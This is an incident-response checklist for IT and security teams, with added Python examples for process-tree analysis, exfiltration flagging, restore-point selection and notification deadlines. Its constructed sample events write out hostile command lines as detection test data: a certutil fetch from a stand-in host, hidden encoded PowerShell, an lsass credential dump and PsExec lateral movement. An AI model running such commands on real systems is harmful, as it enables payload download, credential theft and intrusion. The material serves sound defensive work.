IT Emergency Response Checklist

Initial Response

    Validate that the alert is a true incident, not a false positive from EDR or SIEM. SEV1 means active business impact or confirmed compromise of production or sensitive data; SEV2 is contained or single-system; SEV3 is suspicious activity under investigation. Severity drives paging and stakeholder notification cadence.

    Page through PagerDuty / Opsgenie using the security-incident escalation policy — not the standard ops rotation. For MSPs, page the client's named technical contact in parallel per the MSA. Acknowledge the page in writing so the audit trail is clean.

    For SEV1 only: notify the CIO/CISO, General Counsel, and the breach coach (outside counsel) before any external communication. Counsel directs the investigation under privilege; getting this order wrong is a common evidentiary mistake that costs privilege downstream.

    Stand up the dedicated incident channel in Slack/Teams and the voice bridge. Name an Incident Commander, a Scribe, and a Communications Lead — separate roles, even if the team is small. The IC owns decisions; the Scribe owns the timeline.

    Initial classification drives the containment playbook. Ransomware triggers immediate forensic capture before any reboot; account compromise triggers session revocation; network intrusion triggers segment isolation. Reclassify later as evidence develops — record the initial call.

Containment and Mitigation

    Use the network-isolation feature in CrowdStrike Falcon, SentinelOne, or Defender for Endpoint; it keeps the host reachable from the EDR console while severing all other traffic. Do not power off ransomware-infected hosts; volatile memory is evidence.

    For ransomware and confirmed compromise: capture RAM (WinPMEM, Magnet RAM Capture) and a disk image (FTK Imager, dd) before any remediation. Store with chain-of-custody documentation. Skipping this is the most common reason post-incident attribution fails.

    Disable the account, revoke all active sessions and refresh tokens, and reset MFA methods. Audit and remove any inbox forwarding rules or app consents granted by the user — attackers frequently set forwarding rules for persistence even after the password is rotated.

    Push C2 domains, malicious IPs, and known-bad hashes to the perimeter firewall (FortiGate, Palo Alto), DNS filter (Umbrella, DNSFilter), and EDR custom IOCs. Coordinate with threat intel feeds to add hashes to org-wide blocklists.

    Communications Lead posts a status update to leadership and (per legal direction) to affected business units. Stick to confirmed facts; speculation in writing has discovery implications. Set the cadence — typically every 2 hours during active SEV1 response.

Investigation and Analysis

    Query Splunk / Sentinel / QRadar for authentication events, EDR detections, firewall flows, and DNS over the suspected dwell-time window — extend the window backward at least 30 days from the first detection. Export and preserve the queries and result sets.

    Walk parent-child process relationships from the first EDR detection. Look for living-off-the-land binaries (PowerShell, certutil, mshta), credential access (lsass dumps), and lateral-movement indicators (PsExec, WMI, RDP from atypical sources).
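    The process-tree walk described above, as an added example (not part of the checklist or any EDR vendor's tooling): it reconstructs the ancestry of the detected process, then walks its descendants and tags the indicator families the checklist names. The events and the field names (pid, ppid, image, cmdline) are constructed assumptions, not a real EDR schema.

```python
"""Walk a process tree outward from an EDR detection and tag the indicator
families named in the checklist. Added example; the events below are
constructed and their field names are assumed, not any vendor's schema."""
from collections import defaultdict

# Indicator families from the checklist (image names, lower-case).
LOLBINS = {"powershell.exe", "certutil.exe", "mshta.exe", "rundll32.exe",
           "wscript.exe", "cscript.exe", "regsvr32.exe"}
LATERAL_MOVEMENT = {"psexec.exe", "psexesvc.exe", "wmic.exe", "mstsc.exe"}

# Constructed sample: a macro document spawns PowerShell, which then fetches a
# file, dumps lsass and reaches out to a file server. chrome.exe is a sibling
# branch that must NOT show up in the findings.
EVENTS = [
    {"pid": 100, "ppid": 4,   "image": "explorer.exe",   "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "outlook.exe",    "cmdline": "outlook.exe"},
    {"pid": 300, "ppid": 200, "image": "winword.exe",    "cmdline": "winword.exe invoice.docm"},
    {"pid": 400, "ppid": 300, "image": "powershell.exe", "cmdline": "powershell.exe -nop -w hidden -enc AAAA"},
    {"pid": 500, "ppid": 400, "image": "certutil.exe",   "cmdline": "certutil.exe -urlcache -f http://example.invalid/x x"},
    {"pid": 600, "ppid": 400, "image": "procdump.exe",   "cmdline": "procdump.exe -ma lsass.exe lsass.dmp"},
    {"pid": 700, "ppid": 400, "image": "psexec.exe",     "cmdline": "psexec.exe \\\\FS01 cmd.exe"},
    {"pid": 800, "ppid": 100, "image": "chrome.exe",     "cmdline": "chrome.exe"},
]


def index_events(events):
    """Return (by_pid, children) lookups for the process tree."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    return by_pid, children


def ancestry(by_pid, pid):
    """Image names from the earliest known ancestor down to pid.
    The seen-set guards against pid reuse producing a cycle."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def classify(event):
    """Tag one process with the indicator families from the checklist."""
    image = event["image"].lower()
    cmd = event["cmdline"].lower()
    tags = set()
    if image in LOLBINS:
        tags.add("lolbin")
    if image == "powershell.exe" and (" -enc" in cmd or "-encodedcommand" in cmd):
        tags.add("encoded_command")
    if "lsass" in cmd:
        tags.add("credential_access")
    if image in LATERAL_MOVEMENT:
        tags.add("lateral_movement")
    return tags


def walk_from_detection(events, detected_pid):
    """Ancestry of the detected process plus tagged findings among the
    detected process and all of its descendants (siblings are excluded)."""
    by_pid, children = index_events(events)
    findings, visited, stack = {}, set(), [detected_pid]
    while stack:
        pid = stack.pop()
        if pid in visited or pid not in by_pid:
            continue
        visited.add(pid)
        tags = classify(by_pid[pid])
        if tags:
            findings[pid] = sorted(tags)
        stack.extend(children[pid])
    return {"ancestry": ancestry(by_pid, detected_pid), "findings": findings}


if __name__ == "__main__":
    report = walk_from_detection(EVENTS, 400)
    print(" -> ".join(report["ancestry"]))
    for pid, tags in sorted(report["findings"].items()):
        print(pid, tags)
```

    The ancestry chain (explorer, outlook, winword, powershell) is what ties the detection back to the phishing vector in the root-cause statement; the findings map is what goes into the timeline with the pid as the evidence reference.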

    Walk through with the affected user(s) what they clicked, opened, or installed. Ask about MFA prompts they didn't initiate (push-bombing) and unusual emails. Interview admins for any recent unscheduled changes. Document under counsel direction to preserve privilege.

    Common vectors: phishing → credential theft → MFA fatigue, exposed RDP, unpatched VPN/edge appliance, third-party SaaS compromise, malicious browser extension. Tie the root-cause statement to specific log evidence — vague conclusions undermine the post-mortem.

    Review egress NetFlow, DLP alerts, and cloud audit logs (M365 Unified Audit, Google Workspace Admin) for unusual download volumes or external sharing. A confirmed exfiltration triggers regulatory notification clocks under GDPR (72 hours), HIPAA, and state breach laws.
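    The download-volume review above, as an added example (not part of the checklist, and not the M365 Unified Audit or Google Workspace export format): it baselines each user's daily download bytes from earlier days, flags the review day when it exceeds a multiple of that baseline, falls back to an absolute threshold for users with no history, and separately flags external-sharing events. The log lines, column layout, ratio and threshold are constructed assumptions.

```python
"""Baseline per-user download volume from cloud audit records and flag the
review day's outliers plus external-sharing events. Added example; the log
lines and the column layout are constructed, not a vendor export."""
from collections import defaultdict
from statistics import median

# Constructed audit records (assumed columns). alice's baseline is ~100 MB/day,
# bob is flat, carol appears for the first time on the review day.
AUDIT_LOG = """\
day,user,operation,bytes,external
2024-05-10,alice,FileDownloaded,120000000,no
2024-05-11,alice,FileDownloaded,95000000,no
2024-05-12,alice,FileDownloaded,110000000,no
2024-05-13,alice,FileDownloaded,4800000000,no
2024-05-13,alice,SharingSet,0,yes
2024-05-10,bob,FileDownloaded,30000000,no
2024-05-11,bob,FileDownloaded,28000000,no
2024-05-12,bob,FileDownloaded,31000000,no
2024-05-13,bob,FileDownloaded,29000000,no
2024-05-13,carol,FileDownloaded,2000000000,no
"""


def parse_audit(text):
    """Parse the constructed CSV-like export into typed records."""
    lines = text.strip().splitlines()
    header = lines[0].split(",")
    rows = []
    for line in lines[1:]:
        rec = dict(zip(header, line.split(",")))
        rec["bytes"] = int(rec["bytes"])
        rec["external"] = rec["external"] == "yes"
        rows.append(rec)
    return rows


def daily_downloads(records):
    """{user: {day: total bytes downloaded}}."""
    totals = defaultdict(lambda: defaultdict(int))
    for r in records:
        if r["operation"] == "FileDownloaded":
            totals[r["user"]][r["day"]] += r["bytes"]
    return totals


def flag_exfil_candidates(records, review_day, ratio=10.0, absolute_bytes=1_000_000_000):
    """Return {user: [reasons]} for users worth a closer look on review_day.
    ISO dates compare correctly as strings, so d < review_day is the baseline."""
    totals = daily_downloads(records)
    flags = defaultdict(list)
    for user, by_day in totals.items():
        baseline = [b for d, b in by_day.items() if d < review_day]
        today = by_day.get(review_day, 0)
        if baseline and median(baseline) > 0 and today > ratio * median(baseline):
            flags[user].append("download_volume_vs_baseline")
        elif not baseline and today > absolute_bytes:
            # No history to compare against: fall back to an absolute threshold.
            flags[user].append("download_volume_no_baseline")
    for r in records:
        if r["day"] == review_day and r["external"]:
            flags[r["user"]].append("external_sharing")
    return dict(flags)


if __name__ == "__main__":
    for user, reasons in flag_exfil_candidates(parse_audit(AUDIT_LOG), "2024-05-13").items():
        print(user, reasons)
```

    A flag here is a lead for the log review, not a confirmed exfiltration; confirmation still needs the NetFlow and DLP evidence before the notification clocks start.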

Recovery and Restoration

    Restore from a backup dated before the earliest known compromise indicator — not just the most recent. Use Veeam / Datto / Rubrik immutable copies with object lock; restoring from a writable backup that the attacker also touched is the textbook ransomware reinfection mistake.
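    The restore-point selection rule above, as an added example (not part of the checklist or any backup product's API): it picks the newest immutable copy taken before the earliest known compromise indicator, optionally backs the cutoff up by a dwell-time margin, returns None when nothing qualifies, and explains why each rejected point was rejected so the Scribe can record the decision. The catalogue and its fields are constructed assumptions.

```python
"""Select the restore point the checklist calls for: newest immutable copy
taken before the earliest known compromise indicator. Added example; the
catalogue below is constructed and its fields are assumed."""
from datetime import datetime, timedelta

# Constructed restore-point catalogue (assumed fields; "immutable" stands for
# an object-locked copy). rp-03 is writable; rp-04 postdates the compromise.
RESTORE_POINTS = [
    {"id": "rp-01", "taken": "2024-05-01T02:00:00Z", "immutable": True},
    {"id": "rp-02", "taken": "2024-05-08T02:00:00Z", "immutable": True},
    {"id": "rp-03", "taken": "2024-05-12T02:00:00Z", "immutable": False},
    {"id": "rp-04", "taken": "2024-05-15T02:00:00Z", "immutable": True},
]


def parse_ts(s):
    """Parse an ISO-8601 UTC timestamp with a trailing Z."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def cutoff_for(earliest_indicator, margin_days=0):
    """The latest acceptable backup time: earliest indicator minus a margin
    for dwell time that may predate the first indicator we found."""
    return parse_ts(earliest_indicator) - timedelta(days=margin_days)


def rejection_reason(point, cutoff, require_immutable=True):
    """None if the point is eligible, otherwise why it was rejected."""
    if parse_ts(point["taken"]) >= cutoff:
        return "taken after cutoff"
    if require_immutable and not point["immutable"]:
        return "writable copy (not object-locked)"
    return None


def select_restore_point(points, earliest_indicator, margin_days=0, require_immutable=True):
    """Return the id of the newest eligible restore point, or None."""
    cutoff = cutoff_for(earliest_indicator, margin_days)
    eligible = [p for p in points
                if rejection_reason(p, cutoff, require_immutable) is None]
    if not eligible:
        return None
    return max(eligible, key=lambda p: parse_ts(p["taken"]))["id"]


def decision_record(points, earliest_indicator, margin_days=0, require_immutable=True):
    """{id: 'selected' | 'eligible' | rejection reason} for the timeline."""
    cutoff = cutoff_for(earliest_indicator, margin_days)
    chosen = select_restore_point(points, earliest_indicator, margin_days, require_immutable)
    record = {}
    for p in points:
        reason = rejection_reason(p, cutoff, require_immutable)
        record[p["id"]] = "selected" if p["id"] == chosen else (reason or "eligible")
    return record


if __name__ == "__main__":
    for pid, status in decision_record(RESTORE_POINTS, "2024-05-13T18:30:00Z").items():
        print(pid, status)
```

    With the earliest indicator on 13 May, rp-02 is selected even though rp-03 is newer, because rp-03 is writable; a seven-day margin pushes the choice back to rp-01, and an indicator older than every backup yields None, which is the signal to stop and talk to the IC rather than restore anyway.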

    Rotate krbtgt twice, all Domain Admin / Tier 0 passwords, service account passwords, API keys, app registration secrets, and any shared MSP vault credentials touching the affected client. Skipping krbtgt rotation leaves Golden Ticket persistence intact.

    Run a Tenable / Qualys / Rapid7 authenticated scan on rebuilt hosts before returning them to production. Confirm EDR is reinstalled and reporting healthy, patches are current, and no unauthorized local admin accounts exist on the rebuild.

    Phase users back in: pilot group first (1-2 hours of monitoring), then department, then org-wide. Watch EDR and SIEM dashboards during each phase for re-emergence of IOCs. Have rollback to isolation ready.

    Send the all-clear notice through the Communications Lead. For MSPs, deliver a written restoration confirmation to the client per the MSA. Note any residual restrictions still in place (e.g., VPN limited to known IP ranges).

Post-Incident Review

    Schedule within 7 days while memory is fresh. Include the IC, Scribe, all responders, and a leadership observer. Distribute the timeline-of-events document beforehand so the meeting is analysis, not recap.

    Walk the timeline; identify what worked, what didn't, and what was missing. Frame findings as system or process failures, not individual mistakes — blame culture poisons future reporting. Capture concrete owned action items with due dates.

    Write the executive-readable report covering scope, timeline, root cause, impact, remediation, and follow-up. This document feeds SOC 2 evidence, cyber insurance claims, and (if applicable) regulatory submissions. Get sign-off from counsel before circulation.

    Translate the action items into edits to the IR plan, SOAR playbooks, and detection rules. Add SIEM detections for the IOCs and TTPs observed. Add the scenario to the next tabletop exercise rotation.

    Coordinate with counsel on notification obligations: GDPR (72 hours from awareness), HIPAA (60 days for affected individuals, immediate for 500+), state breach laws (varies, generally 30-90 days), SEC cyber disclosure (4 business days for material incidents at public companies). Track each obligation with its deadline.
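    The notification windows above turned into dated deadlines, as an added example (not part of the checklist and not legal advice in code form): it applies the windows the checklist lists to an awareness timestamp and orders them soonest first. The applicability flags, the weekend-only business-day rule (no holiday calendar), using the shortest state window the checklist gives (30 days) as the default, and counting the SEC window from a separate materiality-determination time are assumptions; counsel confirms which clocks actually apply.

```python
"""Turn the checklist's notification windows into dated deadlines. Added
example; applicability flags, the holiday-free business-day rule and the
30-day default state window are assumptions."""
from datetime import datetime, timedelta, timezone


def add_business_days(start, n):
    """Advance n business days, skipping Saturday and Sunday only
    (public holidays are deliberately not modelled here)."""
    current, remaining = start, n
    while remaining > 0:
        current += timedelta(days=1)
        if current.weekday() < 5:
            remaining -= 1
    return current


def notification_deadlines(awareness, eu_data_subjects=False, phi_involved=False,
                           public_company=False, state_window_days=30,
                           materiality_determined=None):
    """Return {obligation: deadline} for the clocks that apply, soonest first.
    Windows are the ones the checklist lists; the SEC clock runs from the
    materiality determination when one is supplied (assumption)."""
    if awareness.tzinfo is None:
        raise ValueError("use a timezone-aware awareness timestamp")
    deadlines = {}
    if eu_data_subjects:
        deadlines["GDPR supervisory authority"] = awareness + timedelta(hours=72)
    if phi_involved:
        deadlines["HIPAA affected individuals"] = awareness + timedelta(days=60)
    if state_window_days is not None:
        deadlines["State breach law (shortest window)"] = awareness + timedelta(days=state_window_days)
    if public_company:
        start = materiality_determined or awareness
        deadlines["SEC cyber disclosure (material incident)"] = add_business_days(start, 4)
    return dict(sorted(deadlines.items(), key=lambda kv: kv[1]))


def hours_remaining(deadlines, now):
    """Hours left on each clock (negative means already missed)."""
    return {k: (v - now).total_seconds() / 3600 for k, v in deadlines.items()}


if __name__ == "__main__":
    aware = datetime(2024, 6, 6, 15, 0, tzinfo=timezone.utc)  # constructed: a Thursday
    for k, v in notification_deadlines(aware, eu_data_subjects=True, phi_involved=True,
                                       public_company=True).items():
        print(f"{v:%Y-%m-%d %H:%M} UTC  {k}")
```

    For an incident discovered on a Thursday afternoon the SEC four-business-day window lands the following Wednesday, which is why it sorts ahead of the 30-day state window despite being listed last in the checklist; the tracker output is what the Scribe carries into the post-incident review.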